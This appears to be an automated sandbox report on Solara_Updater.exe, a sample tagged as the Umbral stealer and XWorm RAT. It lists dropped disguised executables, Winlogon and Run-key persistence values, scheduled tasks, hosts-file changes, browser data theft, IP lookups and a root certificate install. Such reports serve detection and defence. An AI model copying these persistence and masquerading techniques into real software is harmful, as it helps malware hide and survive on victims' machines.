Malware Analysis Report

2024-10-10 10:04

Sample ID 240519-tpvdjseh8t
Target Solara_Updater.exe
SHA256 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
Tags
umbral xworm execution persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Threat Level: Known bad

The file Solara_Updater.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan

Modifies WinLogon for persistence

Umbral

Detect Xworm Payload

Process spawned unexpected child process

Xworm

Detect Umbral payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Views/modifies file attributes

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Modifies system certificate store

Uses Task Scheduler COM API

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-19 16:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 16:14

Reported

2024-05-19 16:17

Platform

win7-20240419-en

Max time kernel

150s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\", \"C:\\hostNet\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\", \"C:\\hostNet\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\", \"C:\\hostNet\\conhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\hostNet\\conhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Google\\cmd.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\hostNet\\conhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\hostNet\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\hostNet\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Google\\cmd.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSCF6C8047328354985AF527578961D7E65.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\wx6deg.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\de-DE\taskeng.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files\Windows Media Player\de-DE\96094160f8fe35 C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Google\cmd.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Google\ebf1f9fa8afd6d C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\hostNet\bridgeblockportComBroker.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
